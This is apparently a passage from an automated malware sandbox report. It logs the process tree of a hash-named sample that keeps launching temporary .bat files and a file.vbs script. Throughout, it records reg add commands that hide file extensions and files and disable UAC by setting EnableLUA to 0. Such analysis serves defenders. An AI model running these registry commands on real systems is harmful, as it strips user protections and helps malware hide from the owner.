        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        74⤵
        UAC bypass
        
        PID:5024
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JawEsoMQ.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        74⤵
        
        PID:1352
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        75⤵
        
        PID:2608
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        72⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2368
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        72⤵
        
        PID:2304
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        72⤵
        UAC bypass
        
        PID:4540
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pwUYAogA.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        72⤵
        
        PID:4500
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        73⤵
        
        PID:368
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        70⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2372
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        70⤵
        Modifies registry key
        
        PID:1080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        70⤵
        
        PID:4472
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PaAowosA.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        70⤵
        
        PID:876
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        71⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        68⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:3776
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        68⤵
        
        PID:4240
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        68⤵
        UAC bypass
        
        PID:1428
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CMwkwkUw.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        68⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        69⤵
        
        PID:3496
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        66⤵
        
        PID:3748
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        66⤵
        
        PID:1704
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        66⤵
        
        PID:3988
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kcEkUQss.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        66⤵
        
        PID:4488
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        67⤵
        
        PID:5080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        64⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1480
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        64⤵
        
        PID:744
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        64⤵
        UAC bypass
        
        PID:4440
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EeMkcMcI.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        64⤵
        
        PID:1644
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        65⤵
        
        PID:3176
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        62⤵
        Modifies visibility of file extensions in Explorer
        
        PID:400
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        62⤵
        
        PID:4452
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        62⤵
        UAC bypass
        
        PID:4648
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YsskUAsg.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        62⤵
        
        PID:1984
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        63⤵
        
        PID:1180
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        60⤵
        
        PID:4540
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        60⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        60⤵
        UAC bypass
        
        PID:1904
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PoAgAAYU.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        60⤵
        
        PID:2640
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        61⤵
        
        PID:4288
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        58⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:4360
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        58⤵
        
        PID:2180
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        58⤵
        
        PID:1612
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zAMUQsEI.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        58⤵
        
        PID:4456
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        59⤵
        
        PID:464
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        56⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4520
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        56⤵
        
        PID:1836
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        56⤵
        
        PID:2688
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HWckEcMs.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        56⤵
        
        PID:2904
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        57⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        54⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4400
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        54⤵
        
        PID:4180
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        54⤵
        UAC bypass
        
        PID:3092
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xYsMQoAw.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        54⤵
        
        PID:4432
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        55⤵
        
        PID:336
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        52⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        52⤵
        
        PID:4176
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        52⤵
        UAC bypass
        Modifies registry key
        
        PID:3192
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cIMEwUss.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        52⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        53⤵
        
        PID:4840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        50⤵
        
        PID:396
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        50⤵
        Modifies registry key
        
        PID:2388
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        50⤵
        Modifies registry key
        
        PID:3000
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kwIYkUoY.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        50⤵
        
        PID:3024
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        51⤵
        
        PID:1796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        48⤵
        
        PID:2480
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        48⤵
        
        PID:972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        48⤵
        Modifies registry key
        
        PID:4788
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UOYYIIcc.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        48⤵
        
        PID:4088
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        49⤵
        
        PID:768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        46⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3936
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        46⤵
        Modifies registry key
        
        PID:3752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        46⤵
        UAC bypass
        
        PID:2968
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WCQYQkMo.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        46⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        47⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        44⤵
        Modifies registry key
        
        PID:4108
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        44⤵
        Modifies registry key
        
        PID:3548
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        44⤵
        UAC bypass
        Modifies registry key
        
        PID:644
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dcQsAgAc.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        44⤵
        
        PID:1940
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        45⤵
        
        PID:4468
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        42⤵
        
        PID:780
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        42⤵
        Modifies registry key
        
        PID:640
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        42⤵
        UAC bypass
        
        PID:892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fQgMAoEY.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        42⤵
        
        PID:2056
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        43⤵
        
        PID:2972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        40⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5048
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        40⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        40⤵
        Modifies registry key
        
        PID:4712
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RuAssoYA.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        40⤵
        
        PID:1076
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        41⤵
        
        PID:3964
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        38⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        38⤵
        
        PID:3000
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        38⤵
        UAC bypass
        
        PID:400
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HsMcQosk.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        38⤵
        
        PID:3360
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        39⤵
        
        PID:3188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        36⤵
        Modifies registry key
        
        PID:2172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        36⤵
        
        PID:4604
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        36⤵
        UAC bypass
        
        PID:3252
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KCMIMUQs.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        36⤵
        
        PID:2924
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        37⤵
        
        PID:4820
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        34⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        34⤵
        
        PID:3688
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        34⤵
        UAC bypass
        
        PID:4284
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sosAAsEw.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        34⤵
        
        PID:2516
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        35⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        32⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1056
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        32⤵
        Modifies registry key
        
        PID:1452
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        32⤵
        
        PID:1940
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YiEUAcIg.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        32⤵
        
        PID:1616
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        33⤵
        
        PID:1240
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        30⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        30⤵
        
        PID:3348
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        30⤵
        Modifies registry key
        
        PID:892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vwcYQgkI.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        30⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        31⤵
        
        PID:5012
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        28⤵
        Modifies visibility of file extensions in Explorer
        
        PID:628
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        28⤵
        
        PID:4412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        28⤵
        UAC bypass
        
        PID:1180
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FakYIsgY.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        28⤵
        
        PID:1728
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        29⤵
        
        PID:3012
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        26⤵
        
        PID:5044
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        26⤵
        Modifies registry key
        
        PID:4364
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        26⤵
        
        PID:3360
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PkYoEUUw.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        26⤵
        
        PID:1864
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        27⤵
        
        PID:3204
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        24⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1992
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        24⤵
        Modifies registry key
        
        PID:1320
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        24⤵
        UAC bypass
        
        PID:3428
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NaQMkokY.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        24⤵
        
        PID:3680
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        25⤵
        
        PID:972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        22⤵
        
        PID:2888
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        22⤵
        
        PID:3552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        22⤵
        UAC bypass
        
        PID:4276
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SWAwcMkE.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        22⤵
        
        PID:1540
        
        C:\Windows\SysWOW64\cscript.exe
        
